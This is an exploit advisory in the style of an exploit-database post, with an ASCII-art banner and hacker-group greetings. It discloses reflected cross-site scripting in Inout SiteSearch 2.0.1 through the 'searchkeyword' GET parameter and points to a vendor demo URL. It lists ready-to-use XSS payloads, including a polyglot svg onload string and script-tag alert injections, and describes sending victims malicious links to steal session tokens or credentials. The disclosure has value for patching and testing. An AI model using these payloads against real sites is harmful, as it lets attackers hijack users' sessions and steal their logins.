Inout SiteSearch 2.0.1 Cross Site Scripting

┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                      [ Exploits ]                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                        │ │                                         :│  Website  : inoutscripts.com               │ │                                         ││  Vendor   : Inout Scripts                  │ │                                         ││  Software : Inout SiteSearch 2.0.1         │ │ Inout SiteSearch is a premium script    ││  Vuln Type: Cross Site Scripting Reflected │ │ that allows you to add a site           ││  Method   : GET                            │ │ search feature                          ││  Impact   : Manipulate the content of      │ │                                         ││             the site                       │ │                                         ││────────────────────────────────────────────┘ └─────────────────────────────────────────││                              B4nks-NET irc.b4nks.tk #unix                             ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││                                                                                        ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, Sad, His0k4, Hussin X, Mr. SQL     Phr33k , NK, GoldenX, Wehla, Cap, DarkCatSpace, R0ot, KnG, Centerk, chamanwal  loool, DevS, Dark-Gost, Carlos132sp, ProGenius, bomb, fjear, H3LLB0Y, ix7         CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2022                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘GET parameter 'searchkeyword' is vulnerable to XSShttp://inout-sitesearch.demo.inoutscripts.net/index.php/search/result?searchkeyword=[XSS]Some XSS Payloads Reflectedjavascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'><IMG """><SCRIPT>alert("XSS")</SCRIPT>"\></TITLE><SCRIPT>alert("XSS");</SCRIPT>[-] Done